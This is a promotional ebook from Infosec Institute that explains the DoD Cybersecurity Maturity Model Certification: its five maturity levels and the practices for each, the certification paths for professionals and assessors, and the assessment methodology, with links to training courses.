Cybersecurity Maturity

Cybersecurity Maturity Model Certification (CMMC)Everything you need to know about assessments, assessors and getting certified

What is the CMMC framework?The Department of Defense (DoD) supply chain and the Defense Industrial Base (DIB) it supports are continuously under threat by malicious actors. The theft of Federal Contract Information (FCI) and Controlled Unclassified Information (CUI) doesn’t just stifle innovation and undercut U.S. technical advantages, it significantly increases the risk to national security.

To reduce this risk, the DoD released the CMMC framework, which is intended to assess and enhance the cybersecurity posture of the more than 300,000 companies that contribute towards the research, engineering, development, acquisition, production, delivery, sustainment and operation of DoD systems, networks, installations, capabilities and services.

Inside the CMMC requirementsAlthough the CMMC framework is new, many of the security requirements within it are not. Of the 171 practices included in CMMC, 110 of them are specified in NIST SP 800-171 Rev. 2. Additional practices and processes are drawn from other standards, references and sources, such as:

» NIST SP 800-53

» Aerospace Industries Association (AIA) National Aerospace Standard (NAS) 9933 “Critical Security Controls for Effective Capability in Cyber Defense”

» Computer Emergency Response Team (CERT) Resilience Management Model (RMM) v1.2

CMMC builds upon existing regulation (DFARS 252.204-7012) by adding a certification program to verify the implementation of processes and practices across five cybersecurity maturity levels.

Pre-RegisterBecome a CMMC Certified Professional!

https://www.infosecinstitute.com/courses/dod-cmmc-preparation-boot-camp/?utm_source=pardot&utm_medium=ebook&utm_campaign=cmmc%20ebook

CMMC timelineWhen will you be affected?

Infosec approved as one of the first CMMC-AB Licensed

Partner Publishers (LPP)

Infosec approved as one of the first CMMC-AB Licensed

Training Partners (LTP)

Infosec launches Certified CMMC Assessor Level 5 (CCA-5) training

CMMC version 1.0 released

Beta versions of CCP, CCA-1 and CCA-3 exams available

Infosec launches Certified CMMC Professional (CCP) training

CMMC Accreditation Body (CMMC-AB) selects 72

candidates for Provisional Assessor program

CMMC exam development begins

Phased rollout continues until all DoD contracts

require CMMC certification

JAN 2020

AUG 2020

SEPT 2020

APR 2021

JAN 2021

OCT 2021

DEC 2021

2022-2025

JAN 2022

First Certified CMMC Instructors (CCI) start training

Full release of CCP, CCA-1 and CCA-3 exams

Infosec launches Certified CMMC Assessor Level 1

(CCA-1) training

TBD

Beta versions of CCA-5 exam available

Infosec launches Certified CMMC Assessor Level 3 (CCA-3) training



Understanding the 5 CMMC maturity levelsThe CMMC framework contains five maturity levels, with Level 5 being the highest. The processes and practices required for each level are aligned around:

» Level 1: Safeguarding Federal Contract Information (FCI)

» Level 2: Transitioning towards protecting Controlled Unclassified Information (CUI)

» Level 3: Protecting CUI

» Levels 4-5: Protecting CUI and reducing the risk of Advanced Persistent Threats (APTs)

Organizations must demonstrate both the institutionalization of processes and the implementation of practices to achieve a certification level. For example, if an organization demonstrates Level 3 practices but only Level 2 processes, they will be classified overall as Level 2.

CMMC by the numbers

Graphic adapted from CMMC-AB.

PROCESSES PRACTICES

Optimizing

Reviewed

Managed

Documented

Performed

Advanced / progressive

Proactive

Good cyber hygiene

Intermediate cyber hygiene

Basic cyber hygieneLevel 1

Level 2

Level 3

Level 4

Level 5 5 levels

Level 1: 0 processes, 17 practices

Level 2: 2 processes, 55 practices

Level 3: 1 process, 58 practices



CMMC levels are cumulative. To achieve Level 5, an organization must demonstrate all 5

processes and 171 practices included in the framework.

5 processes

171 practices across 17 domains

(e.g., access control, incident response)



CMMC Professionals (CCP) The Certified CMMC Professional (CCP) is the first step in the CMMC career path. In addition to being a prerequisite for Certified CMMC Assessor (CCA) or Certified CMMC Instructor (CCI), it also certifies you as a valuable resource for consulting agencies, CMMC Third-Party Assessor Organizations (C3PAOs) and organizations needing CMMC support and guidance.

How to become a Certified CMMC Professional

Ready to get certified?CCP requirements

» College degree in a technical field or other equivalent experience (including military), or at least two years in cyber or information technology

» Get CMMC-AB approval of your submitted application

» Complete CCP training from an LTP (Licensed Training Provider), such as Infosec

CCP benefits

» Participate as an assessment team member under the supervision of a CCA

» Work towards becoming a CCA or CCI

» Validate your training and understanding of the CMMC for clients and employers

» Use the CCP logo and be listed in the CMMC-AB Marketplace

Check out our Certified CMMC Professional training page to learn more.

CCP Training

1

5

6 7

4

2

3Verify you meet prerequisites Apply online to become a CCP

Get application evaluated and approved

Become a Certified CMMC Professional (CPP)

Sign code of professional conduct

Attend CCP training from a Licensed Training Provider

Take and pass the CCP exam





CMMC Assessor (CCA)Certified CMMC Professionals (CCP) can apply to become a Certified CMMC Assessor Level 1 (CCA-1) the first of three assessor levels (1, 3, 5) available on the CMMC Assessor career path.

1. Certified CMMC Assessor Level 1 (CCA-1)



Ready to get certified?CCA-1 requirements

» Earn your CCP

» Be a U.S. Person (Green card is acceptable); U.S. citizenship is required to participate as a team member on maturity level 2 (ML-2) assessments

» Have or gain a favorably adjudicated Tier 3 background check; or possess a NAC (National Agency Check), DHS Suitability credential or other DoD accepted clearance (required to participate on ML-2 or higher assessment teams)

CCA-1 benefits

» Conduct CMMC maturity level 1 (ML-1) assessments

» Supervise CCPs in the conduct of ML-1 assessments

» After completing 3 assessments

» Use the CMMC CCA-1 logo

» Get listed in the CMMC-AB Marketplace

Check out our Certified CMMC Assessor Level 1 (CCA-1)training page to learn more.

CCA-1 Training

1

109

2

8

3

4

6

7

Verify you meet prerequisites

Apply online to become a CCA-1

Pass background check (or meet other requirements)

5

Take and pass the CCA-1 exam

Pay CCA-1 annual certification fee and sign license agreement

Schedule CMMC-AB staff to observe your first assessment

Conduct first assessment (under contract with C3PAO)

CMMC-AB observer reports on your performance

Become a Certified CMMC Assessor Level 1 (CCA-1)

Attend CCA-1 training from a Licensed Training Provider


https://www.infosecinstitute.com/courses/cmmc-ab-certified-assessor-level-1/?utm_source=pardot&utm_medium=ebook&utm_campaign=cmmc%20ebook



Organizations seeking certification (OSC)CMMC is being incorporated into the Defense Federal Acquisition Regulation Supplement (DFARS), and by 2025 all suppliers will need a certification in order to bid on contracts. Contractors can achieve a CMMC level for their entire enterprise network or for a particular segment or enclave, depending where the protected information is handled and stored. CMMC-AB estimates the certification process will take at least six months.

How to get your organization CMMC certified

Want to learn more about CMMC?Enroll in Infosec’s Certified CMMC Professional (CCP) Boot Camp to get a comprehensive overview of the CMMC requirements as well as practical recommendations and tools for achieving CMMC certification for your organization.

Keep an eye on the Infosec CMMC page for the latest CMMC updates, announcements and training resources — and be one of the first organizations to get certified!

Identify scope (organization, segment or enclave)

Identify desired maturity level to bid on contracts

Pre-assess using Registered Provider Organization (RPO) or CMMC Third-Party Assessor Organization (C3PAO) (optional)

Close any identified gaps

Schedule and complete assessment with C3PAO

Resolve any findings (if any) within 90 days

CMMC-AB reviews the submitted assessment

If approved, get a 3-year CMMC certification

1 2

3

45

7 8

6

CMMC Resources




https://www.infosecinstitute.com/solutions/organization/government/cmmc/?utm_source=pardot&utm_medium=ebook&utm_campaign=cmmc%20ebook



CMMC resourcesThe CMMC assessment process is outlined in guides available on the Office of the Under Secretary of Defense for Acquisition & Sustainment (OUSD(A&S)) website:

» CMMC Level 1 Assessment Guide (editable)

» CMMC Level 3 Assessment Guide (editable)

» CMMC Level 5 Assessment Guide (coming soon)

Other resources

» CMMC Model v1.02, its appendices and appendices in tabular form

» CMMC Model Errata v1.0

» CMMC Glossary (editable)

CMMC assessment overviewCertification provides assurance of practices and processesCertified Assessors use the same assessment methods for each contractor. Once a contractor is assessed and certified at a level, other entities (e.g., government sponsors and prime contractors looking to hire subcontractors) have assurance the certified contractor meets CMMC practices and processes.

Methodology the same regardless of sizeThe CMMC assessment methodology follows a data-centric security process that applies the practices equally, regardless of the contractor’s size, constraints or complexity. All CMMC levels are achievable by small, medium and large contractors.

Assessment scope pre-determined by OSC and C3PAOPrior to a CMMC assessment, the contractor must define the scope for the assessment that represents the boundary for which the CMMC certificate will be issued. Additional guidance on assessment scope will be available in the next version of the CMMC Assessment Guides.


https://www.acq.osd.mil/cmmc/docs/CMMC_AG_Lvl1_20201208_editable.pdf




https://www.acq.osd.mil/cmmc/docs/CMMC_ModelMain_V1.02_20200318.pdf

https://www.acq.osd.mil/cmmc/docs/CMMC_Appendices_V1.02_20200318.pdf

https://www.acq.osd.mil/cmmc/docs/CMMCModelExcel_V1.02_20200318.xlsx

https://www.acq.osd.mil/cmmc/docs/CMMC_Errata_20201208_Final.pdf

https://www.acq.osd.mil/cmmc/docs/CMMC_Glossary_20201208_editable.pdf


CMMC assessment criteria and methodologyThe CMMC assessment procedure is defined in NIST SP 800-171A Section 2.11 and includes:

» Assessment objects: Things a Certified Assessor will investigate » Assessment actions: How Certified Assessor will investigate those objects » Assessment objectives: Determination statement related to the CMMC practice or

process being assessed

SpecificationsDocument-based artifacts (e.g., policies, procedures, security plans, security requirements,

functional specifications, architectural designs) associated

with a system.

MechanismsThe specific hardware, software

or firmware safeguards employed within a system.

Activities The protection-related actions

supporting a system that involve people (e.g., conducting system backup operations, exercising

a contingency plan and monitoring network traffic).

IndividualsOr groups of individuals, are people applying the

specifications, mechanisms or activities described above.

CMMC assessment objects



CMMC assessment actionsCertified Assessors must select at least two of the three following actions as they collect evidence for each assessment objective:

» Interviews tell the Certified Assessor what the contractor staff believe to be true.

» Documentation provides evidence of intent.

» Testing demonstrates what has or has not been done.

InterviewThe Certified Assessor has discussions

with individuals within an organization to understand if a practice or process has been

addressed.

Interviews of applicable staff (possibly at different organizational levels) determine if:

» CMMC practices or processes are implemented

» If adequate resourcing, training and planning have occurred for individuals to perform the practices

ExamineThe Certified Assessor can review, inspect,

observe, study or analyze assessment objects (documents, mechanisms or activities).

Documents need to be in their final forms (drafts are not eligible) and include:

» Policy, process and procedure documents » Training materials » Plans and planning documents » System-level, network and data flow

diagrams

Test The Certified Assessor will determine which

practices or objectives within a practice need demonstration or testing. Not all practices

will require testing.

For example:

» Contractor staff may talk about how users are identified

» Documentation may provide details on how users are identified

» Seeing a demonstration of identifying users provides evidence that the practice is met



Inherited practicesA contractor can inherit practice or process objectives. A practice or process objective that is inherited is met because adequate evidence is provided that the enterprise or another entity, such as an External Service Provider (ESP), performs the practice or process objective.

For each practice or process objective that is inherited, the Certified Assessor includes statements that indicate how they were evaluated and from whom they are inherited.

If the contractor cannot demonstrate adequate evidence for all assessment objectives, through either contractor evidence or evidence of inheritance, the contractor will receive a NOT MET for the practice or process.

Assessment findingsThe assessment of a CMMC practice or process results in one of three possible findings: MET, NOT MET, or NOT APPLICABLE.

MET: The contractor successfully meets the practice or process. For each practice or process marked MET, the Certified Assessor includes statements that indicate the response conforms to the objectives and documents the appropriate evidence to support the response.

NOT MET: The contractor has not met the practice or process. For each practice or process marked NOT MET, the Certified Assessor includes statements that explain why and documents the appropriate evidence that the contractor does not conform to the objectives.

NOT APPLICABLE (N/A): The practice or process does not apply. For each practice or process marked N/A, the Certified Assessor includes a statement that explains why the practice or process does not apply to the contractor. For example, SC.1.176 might be N/A if there are no publicly accessible systems



CMMC Level 1Processes: PerformedLevel 1 requires that an organization performs the specified practices. Because the organization may only be able to perform these practices in an ad-hoc manner and may or may not rely on documentation, process maturity is not assessed for Level 1.

Practices: Basic cyber hygieneLevel 1 focuses on the protection of FCI and consists only of practices that correspond to the basic safeguarding requirements specified in 48 CFR 52.204-21 (“Basic Safeguarding of Covered Contractor Information Systems”).

Level 1 practices

Access control » Limit information system access to authorized users, processes acting

on behalf of authorized users or devices (including other information systems).

» Limit information system access to the types of transactions and functions that authorized users are permitted to execute.

» Verify and control/limit connections to and use of external information systems.

» Control information posted or processed on publicly accessible information systems.

Identification and authentication » Identify information system users, processes acting on behalf of users or

devices. » Authenticate (or verify) the identities of those users, processes or devices,

as a prerequisite to allowing access to organizational information systems.

Media protection » Sanitize or destroy information system media containing Federal Contract

Information before disposal or release for reuse.

Physical protection » Limit physical access to organizational information systems, equipment

and the respective operating environments to authorized individuals. » Escort visitors and monitor visitor activity. » Maintain audit logs of physical access. » Control and manage physical device access.

System and communications protection

» Monitor, control and protect organizational communications (i.e., information transmitted or received by organizational information systems) at the external boundaries and key internal boundaries of the information systems.

» Implement subnetworks for publicly accessible system components that are physically or logically separated from internal networks.

System and information integrity » Identify, report and correct information and information system flaws in a

timely manner. » Provide protection from malicious code at appropriate locations within

organizational information systems. » Update malicious code protection mechanisms when new releases are

available. » Perform periodic scans of the information system and real-time scans of

files from external sources as files are downloaded, opened or executed.



CMMC Level 2Processes: DocumentedLevel 2 requires that an organization establish and document practices and policies to guide the implementation of their CMMC efforts. The documentation of practices enables individuals to perform them in a repeatable manner. Organizations develop mature capabilities by documenting their processes and then practicing them as documented.

Practices: Intermediate cyber hygieneLevel 2 serves as a progression from Level 1 to Level 3 and consists of a subset of the security requirements specified in NIST SP 800-171 as well as practices from other standards and references. Because this level represents a transitional stage, a subset of practices reference the protection of CUI.

Level 2 practices

Access control » Provide privacy and security notices consistent with applicable CUI rules. » Limit use of portable storage devices on external systems. » Employ the principle of least privilege, including for specific security

functions and privileged accounts. » Use non-privileged accounts or roles when accessing nonsecurity

functions. » Limit unsuccessful logon attempts. » Use session lock with pattern-hiding displays to prevent access and

viewing of data after a period of inactivity. » Authorize wireless access prior to allowing such connections. » Monitor and control remote access sessions. » Route remote access via managed access control points. » Control the flow of CUI in accordance with approved authorizations

Audit and accountability » Ensure that the actions of individual system users can be uniquely traced

to those users so they can be held accountable for their actions. » Create and retain system audit logs and records to the extent needed to

enable the monitoring, analysis, investigation and reporting of unlawful or unauthorized system activity.

» Provide a system capability that compares and synchronizes internal system clocks with an authoritative source to generate time stamps for audit records.

» Review audit logs.

Awareness and training » Ensure that managers, system administrators and users of organizational

systems are made aware of the security risks associated with their activities and of the applicable policies, standards and procedures related to the security of those systems.

» Ensure that personnel are trained to carry out their assigned information security-related duties and responsibilities.

Configuration management » Establish and maintain baseline configurations and inventories of

organizational systems (including hardware, software, firmware and documentation) throughout the respective system development life cycles.

» Employ the principle of least functionality by configuring organizational systems to provide only essential capabilities.

» Control and monitor user-installed software. » Establish and enforce security configuration settings for information

technology products employed in organizational systems. » Track, review, approve or disapprove, and log changes to organizational

systems. » Analyze the security impact of changes prior to implementation.

Identification and authentication » Enforce a minimum password complexity and change of characters when

new passwords are created. » Prohibit password reuse for a specified number of generations. » Allow temporary password use for system logons with an immediate



change to a permanent password. » Store and transmit only cryptographically-protected passwords. » Obscure feedback of authentication information.

Incident response » Establish an operational incident-handling capability for organizational

systems that includes preparation, detection, analysis, containment, recovery and user response activities.

» Detect and report events. » Analyze and triage events to support event resolution and incident

declaration. » Develop and implement responses to declared incidents according to

pre-defined procedures. » Perform root cause analysis on incidents to determine underlying

causes.

Maintenance » Perform maintenance on organizational systems. » Provide controls on the tools, techniques, mechanisms and personnel

used to conduct system maintenance. » Require multifactor authentication to establish nonlocal maintenance

sessions via external network connections and terminate such connections when nonlocal maintenance is complete.

» Supervise the maintenance activities of personnel without required access authorization.

Media protection » Protect (i.e., physically control and securely store) system media

containing CUI, both paper and digital. » Limit access to CUI on system media to authorized users. » Control the use of removable media on system components.

Personnel security » Screen individuals prior to authorizing access to organizational systems

containing CUI. » Ensure that organizational systems containing CUI are protected during

and after personnel actions such as terminations and transfers.

Physical protection

» Protect and monitor the physical facility and support infrastructure for organizational systems.

Recovery » Regularly perform and test data back-ups. » Protect the confidentiality of backup CUI at storage locations.

Risk management » Periodically assess the risk to organizational operations (including

mission, functions, image or reputation), organizational assets and individuals, resulting from the operation of organizational systems and the associated processing, storage or transmission of CUI.

» Scan for vulnerabilities in organizational systems and applications periodically and when new vulnerabilities affecting those systems and applications are identified.

» Remediate vulnerabilities in accordance with risk assessments.

Security assessment » Develop, document and periodically update system security plans that

describe system boundaries, system environments of operation, how security requirements are implemented, and the relationships with or connections to other systems.

» Periodically assess the security controls in organizational systems to determine if the controls are effective in their application.

» Develop and implement plans of action designed to correct deficiencies and reduce or eliminate vulnerabilities in organizational systems.

System and communications protection » Prohibit remote activation of collaborative computing devices and

provide indication of devices in use to users present at the device. » Use encrypted sessions for the management of network devices.

System and information integrity » Monitor system security alerts and advisories and take action in

response. » Monitor organizational systems, including inbound and outbound

communications traffic, to detect attacks and indicators of potential attacks.

» Identify unauthorized use of organizational systems.



CMMC Level 3Processes: ManagedLevel 3 requires that an organization establish, maintain and resource a plan demonstrating the management of activities for practice implementation. The plan may include information on missions, goals, project plans, resourcing, required training and involvement of relevant stakeholders.

Practices: Good cyber hygiene Level 3 focuses on the protection of CUI and encompasses all of the security requirements specified in NIST SP 800-171 as well as additional practices from other standards and references to mitigate threats. It is noted that DFARS clause 252.204-7012 (“Safeguarding of Covered Defense Information and Cyber Incident Reporting”) specifies additional requirements beyond the NIST SP 800-171 security requirements such as incident reporting.

Level 3 practices

Access control » Separate the duties of individuals to reduce the risk of malevolent activity

without collusion. » Prevent non-privileged users from executing privileged functions and

capture the execution of such functions in audit logs. » Terminate (automatically) user sessions after a defined condition. » Protect wireless access using authentication and encryption. » Control connection of mobile devices. » Employ cryptographic mechanisms to protect the confidentiality of

remote access sessions. » Authorize remote execution of privileged commands and remote access

to security-relevant information. » Encrypt CUI on mobile devices and mobile computing platforms.

Asset management » Define procedures for the handling of CUI data.

Audit and accountability » Review and update logged events. » Alert in the event of an audit logging process failure. » Collect audit information (e.g., logs) into one or more central repositories. » Protect audit information and audit logging tools from unauthorized

access, modification and deletion. » Limit management of audit logging functionality to a subset of privileged

users. » Correlate audit record review, analysis and reporting processes for

investigation and response to indications of unlawful, unauthorized, suspicious or unusual activity.

» Provide audit record reduction and report generation to support on-demand analysis and reporting.

Awareness and training » Provide security awareness training on recognizing and reporting

potential indicators of insider threat.

Configuration management » Define, document, approve and enforce physical and logical access

restrictions associated with changes to organizational systems. » Restrict, disable or prevent the use of nonessential programs, functions,

ports, protocols and services. » Apply deny-by-exception (blacklisting) policy to prevent the use of

unauthorized software or deny-all, permit-by-exception (whitelisting) policy to allow the execution of authorized software.

Identification and authentication » Use multifactor authentication for local and network access to privileged

accounts and for network access to non-privileged accounts. » Employ replay-resistant authentication mechanisms for network access

to privileged and non-privileged accounts. » Prevent the reuse of identifiers for a defined period. » Disable identifiers after a defined period of inactivity.

Incident response » Track, document and report incidents to designated officials and/or

authorities both internal and external to the organization.



» Test the organizational incident response capability.

Maintenance » Ensure equipment removed for off-site maintenance is sanitized of any

CUI. » Check media containing diagnostic and test programs for malicious code

before the media are used in organizational systems.

Media protection » Mark media with necessary CUI markings and distribution limitations. » Prohibit the use of portable storage devices when such devices have no

identifiable owner. » Control access to media containing CUI and maintain accountability for

media during transport outside of controlled areas. » Implement cryptographic mechanisms to protect the confidentiality of

CUI stored on digital media during transport unless otherwise protected by alternative physical safeguards.

Physical protection » Enforce safeguarding measures for CUI at alternate work sites.

Recovery » Regularly perform complete, comprehensive and resilient data back-ups

as organizationally defined.

Risk management » Periodically perform risk assessments to identify and prioritize

risks according to the defined risk categories, risk sources and risk measurement criteria.

» Develop and implement risk mitigation plans. » Manage non-vendor-supported products (e.g., end of life) separately and

restrict as necessary to reduce risk.

Security assessment » Monitor security controls on an ongoing basis to ensure the continued

effectiveness of the controls. » Employ a security assessment of enterprise software that has been

developed internally, for internal use and that has been organizationally defined as an area of risk.

Situational awareness » Receive and respond to cyber threat intelligence from information

sharing forums and sources and communicate to stakeholders.

System and communications protection » Employ FIPS-validated cryptography when used to protect the

confidentiality of CUI.

» Employ architectural designs, software development techniques and systems engineering principles that promote effective information security within organizational systems.

» Separate user functionality from system management functionality. » Prevent unauthorized and unintended information transfer via shared

system resources. » Deny network communications traffic by default and allow network

communications traffic by exception (i.e., deny all, permit by exception). » Prevent remote devices from simultaneously establishing non-remote

connections with organizational systems and communicating via some other connection to resources in external networks (i.e., split tunneling).

» Implement cryptographic mechanisms to prevent unauthorized disclosure of CUI during transmission unless otherwise protected by alternative physical safeguards.

» Terminate network connections associated with communications sessions at the end of the sessions or after a defined period of inactivity.

» Establish and manage cryptographic keys for cryptography employed in organizational systems.

» Control and monitor the use of mobile code. » Control and monitor the use of Voice over Internet Protocol (VoIP)

technologies. » Protect the authenticity of communications sessions. » Protect the confidentiality of CUI at rest. » Implement Domain Name System (DNS) filtering services. » Implement a policy restricting the publication of CUI on externally owned,

publicly accessible websites (e.g., forums, LinkedIn, Facebook, Twitter).

System and information integrity » Employ spam protection mechanisms at information system access entry

and exit points. » Implement email forgery protections. » Utilize sandboxing to detect or block potentially malicious email.



CMMC Level 4Processes: ReviewedLevel 4 requires that an organization review and measure practices for effectiveness. In addition to measuring practices for effectiveness, organizations at this level are able to take corrective action when necessary and inform higher level management of status or issues on a recurring basis.

Practices: ProactiveLevel 4 focuses on the protection of CUI from APTs and encompasses a subset of the enhanced security requirements from Draft NIST SP 800-171B as well as other cybersecurity best practices. These practices enhance the detection and response capabilities of an organization to address and adapt to the changing tactics, techniques and procedures (TTPs) used by APTs.

Level 4 practices

Access control » AC.Control information flows between security domains on connected

systems. » Periodically review and update CUI program access permissions. » Restrict remote network access based on organizationally defined risk

factors such as time of day, location of access, physical location, network connection state and measured properties of the current user and role.

Asset management » Employ a capability to discover and identify systems with specific

component attributes (e.g., firmware level, OS type) within your inventory.

Audit and accountability » Automate analysis of audit logs to identify and act on critical indicators

(TTPs) and/or organizationally defined suspicious activity. » Review audit information for broad activity in addition to per-machine

activity.

Awareness and training » Provide awareness training focused on recognizing and responding

to threats from social engineering, advanced persistent threat actors, breaches and suspicious behaviors; update the training at least annually or when there are significant changes to the threat.

» Include practical exercises in awareness training that are aligned with current threat scenarios and provide feedback to individuals involved in the training.

Configuration management » Employ application whitelisting and an application vetting process for

systems identified by the organization.

Incident response » Use knowledge of attacker tactics, techniques and procedures in incident

response planning and execution. » Establish and maintain a security operations center capability that

facilitates a 24/7 responsecapability.

Risk management » Catalog and periodically update threat profiles and adversary TTPs. » Employ threat intelligence to inform the development of the system and

security architectures, selection of security solutions, monitoring, threat hunting, and response and recovery activities.

» Perform scans for unauthorized ports available across perimeter network boundaries over the organization’s internet network boundaries and other organizationally defined boundaries.

» Develop and update as required, a plan for managing supply chain risks associated with the IT supply chain.

Security assessment » Create, maintain and leverage a security strategy and roadmap for

organizational cybersecurity improvement. » Conduct penetration testing periodically, leveraging automated scanning

tools and ad hoc tests using human experts. » Periodically perform red teaming against organizational assets in order to

validate defensivecapabilities.



Situational awareness » Establish and maintain a cyber threat hunting capability to search for

indicators of compromise in organizational systems and detect, track and disrupt threats that evade existing controls.

» Design network and system security capabilities to leverage, integrate and share indicators of compromise.

System and communications protection » Employ physical and logical isolation techniques in the system and security

architecture and/or where deemed appropriate by the organization. » Isolate administration of organizationally defined high-value critical network

infrastructure components and servers. » Utilize threat intelligence to proactively block DNS requests from reaching

malicious domains. » Employ mechanisms to analyze executable code and scripts (e.g., sandbox)

traversing internet network boundaries or other organizationally defined boundaries.

» Utilize a URL categorization service and implement techniques to enforce URL filtering of websites that are not approved by the organization.

System and information integrity » Use threat indicator information relevant to the information and systems

being protected and effective mitigations obtained from external organizations to inform intrusion detection and threat hunting.



CMMC Level 5Processes: OptimizingLevel 5 requires an organization to standardize and optimize process implementation across the organization.

Practices: Advanced / progressiveLevel 5 focuses on the protection of CUI from APTs. The additional practices increase the depth and sophistication of cybersecurity capabilities.

Level 5 practices

Access control » Identify and mitigate risk associated with unidentified wireless access

points connected to the network.

Audit and accountability » Identify assets not reporting audit logs and assure appropriate

organizationally defined systems are logging.

Configuration management » Verify the integrity and correctness of security critical or essential

software as defined by the organization (e.g., roots of trust, formal verification or cryptographic signatures)

Incident response » In response to cyber incidents, utilize forensic data gathering across

impacted systems, ensuring the secure transfer and protection of forensic data.

» Use a combination of manual and automated, real-time responses to anomalous activities that match incident patterns.

» Establish and maintain a cyber incident response team that can investigate an issue physically or virtually at any location within 24 hours.

» Perform unannounced operational exercises to demonstrate technical and procedural responses.

Recovery » Ensure information processing facilities meet organizationally defined

information security continuity, redundancy and availability requirements

Risk management » Utilize an exception process for non-whitelisted software that includes

mitigation techniques.

» Analyze the effectiveness of security solutions at least annually to address anticipated risk to the system and the organization based on current and accumulated threat intelligence.

System and communications protection » Configure monitoring systems to record packets passing through the

organization’s internet network boundaries and other organizationally defined boundaries.

» Enforce port and protocol compliance. » Employ organizationally defined and tailored boundary protections in

addition to commercially available solutions.

System and information integrity » Analyze system behavior to detect and mitigate execution of normal

system commands and scripts that indicate malicious actions. » Monitor individuals and system components on an ongoing basis for

anomalous or suspicious behavior



About InfosecAt Infosec, we believe knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with certifications and skills training. We also empower all employees with security awareness training to stay cybersafe at work and home. Driven by smart people wanting to do good, Infosec educates entire organizations to defend themselves from cybercrime. It’s what we do every day — equipping everyone with the latest security skills and confidence to be safe online.

Learn more at infosecinstitute.com.

http://infosecinstitute.com/?utm_source=pardot&utm_medium=ebook&utm_campaign=cmmc%20ebook

Additional resourcesInfosec CMMC training resources

» CMMC resource hub » Certified CMMC Professional (CCP) Boot Camp » Certified CMMC Assessor Level 1 (CCA-1) Boot Camp

Other useful resources » Cybersecurity Maturity Model Certification » Cybersecurity Maturity Model Certification Accreditation Body (CMMC-AB)

©2021 Infosec, Inc. All rights reserved.





https://www.acq.osd.mil/cmmc/draft.html

https://www.cmmcab.org/

Cybersecurity Maturity

Documents

Transcript of Cybersecurity Maturity